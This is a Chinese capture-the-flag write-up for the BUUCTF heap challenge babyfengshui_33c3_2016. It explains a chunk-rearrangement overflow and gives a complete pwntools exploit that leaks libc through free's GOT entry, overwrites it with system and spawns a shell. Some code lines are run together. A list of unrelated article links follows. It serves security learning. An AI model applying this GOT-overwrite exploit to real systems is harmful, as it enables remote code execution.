当前位置：首页 > news >正文

[BUUCTF]-PWN:babyfengshui_33c3_2016解析

news 2026/3/27 22:28:53

又是一道堆题，先看保护

关键信息是32位，没开pie

直接看ida

大致是alloc创建堆块，free释放堆块，show查看堆块内容，fill填充堆块内容

其他的都没啥关键的要讲，但alloc那里非常需要解析一下

解释如上图

再具体一点就是我们输入的字节大小+堆块地址>=相邻0x80堆块的地址时会被强制退出

必须要我们输入的字节大小+堆块地址<相邻0x80堆块的地址

那就意味这即便你填充到极限大小，即使下面有加1，你也没法修改相邻堆块的堆头size

解题思路：

上面我们提到程序限制输入字节大小的手段，但是这个判断条件很特殊，必须要是相邻的堆块才能这么判断，但当我们先创建任意大小的两个堆块，再free掉堆块0，再申请一个0x80大小的堆块，这时候我们申请的0x80大小的堆块就会申请到原来相邻的程序自动创建的0x80大小的堆块。可这时系统申请的堆块就没法与我们创建的0x80大小的堆块相邻了，因为这时我们申请的堆块相邻已经有堆块了，所以他就会往下找空间去存放程序创建的0x80堆块了。

而这时，我们可以填充的字节大小就会变大很多，足以覆盖下一个我们自己申请的堆块的相邻程序自动创建堆块里存放的堆块指针

有点绕，简单点来说就是覆盖堆块1的指针，把他改为free的got地址，这样打印free的got地址与替换free的got表里的内容为system就可以一步到位了

完整exp：

from pwn import*
from LibcSearcher import*
context(log_level='debug')
p=process('./fs')
#p=remote('node5.buuoj.cn',29284)
free_got=0x804B010def alloc(description,size,context):p.sendlineafter(b'Action:',str(0))p.sendlineafter(b'size of description:',str(description))p.sendlineafter(b'name:',b'aa')p.sendlineafter(b'text length:',str(size))p.sendlineafter(b'text:',context)
def free(index):p.sendlineafter(b'Action:',str(1))p.sendlineafter(b'index',str(index))
def show(index):p.sendlineafter(b'Action:',str(2))p.sendlineafter(b'index',str(index))
def fill(index,size,context):p.sendlineafter(b'Action:',str(3))p.sendlineafter(b'index',str(index))p.sendlineafter(b'text length:',str(size))p.sendlineafter(b'text:',context)alloc(0x8,0x8,b'bb') #这仨堆块大小没太大限制，当然越少越好计算就行
alloc(0x10,0x8,b'bb') #这里填入的两个字节大小有点绕，其实他后一个大小是用到了填充堆块的那个函数
alloc(0x10,0x8,b'/bin/sh\x00')
free(0)
payload=p32(0)*33+p32(0x19)+p32(0)*5+p32(0x89)+p32(free_got) #注意这里不要破坏已有的堆块结构
alloc(0x80,len(payload),payload) #这里要是0x80大小
print(len(payload))
show(1)
free_addr=u32(p.recvuntil(b'\xf7')[-4:])
print(free_addr)
libc=LibcSearcher('free',free_addr)
libcbase=free_addr-libc.dump('free')
system=libcbase+libc.dump('system')
payload=p32(system) #因为堆块1的指针被替换成free_got所以编辑堆块1就是修改free的got表里的内容
fill(1,len(payload),payload)
free(2) #相当于运行system('/bin/sh')
p.interactive()

补充点1：创建堆块alloc那里刚开始看可能有点绕，解释一下，就是name是啥不重要，前一个大小其实就是我们要申请的堆块大小，后面那一个大小是我们要填充堆块的内容的大小，那个b'bb'就是我们要填充堆块内容的地方

[BUUCTF]-PWN:babyfengshui_33c3_2016解析

解题思路：

完整exp：

相关文章：

[BUUCTF]-PWN:babyfengshui_33c3_2016解析

小程序系列--9.生命周期

SQL注入实战操作

Microsoft Remote Desktop for Mac(远程桌面连接）激活版

分布式日志

21.云原生之ArgoCD CICD实战（部分待补充）

一文读懂JavaScript DOM节点操作（JavaScript DOM节点操作详解）

【Linux】常见指令（一）

C语言大师（8）异常处理

网络防御保护——1.网络安全概述

SpringBoot整合ElasticSearch实现分页查询

[C++]使用yolov8的onnx模型仅用opencv和bytetrack实现目标追踪

打造专业级ChatGPT风格聊天界面：SpringBoot与Vue实现动态打字机效果，附完整前后端源码

KMP-重复子字符串

如何使用Markdown生成目录索引

R语言【taxa】——as_taxon()：转换为 taxon 对象

Android状态栏布局隐藏的方法

idea创建公用依赖包项目

设计模式之装饰器模式

【Java万花筒】缓存与存储：Java应用中的数据处理利器

数据清洗避坑指南：缺失值和异常值处理的5个常见错误（附真实案例）

计算机组成原理实验避坑指南：存储器地址映射常见错误及解决方法

[特殊字符]空间智能目标追踪系统：从“看视频”到“掌控空间”的技术跃迁——多模态识别 × 空间建模 × 轨迹预测，让视频系统具备“感知与决策能力”[特殊字符] 视频系统的终极形态，不是记录世

如何快速找到领域内的核心论文？3 条最有效路径

若依框架二次开发避坑指南：手把手教你定制菜品管理系统

网络安全学习攻略宝典，从菜鸟到高手的必由之路

微信小程序人脸核身接入全攻略：从资质准备到代码实现（附避坑指南）

开源工具实现游戏存档编辑：虚幻引擎存档处理全指南

Windows 11优化终极指南：一键清理预装软件与提升系统性能

LeetCode 2946. 循环移位后的矩阵相似检查【数学周期性+原地比较】简单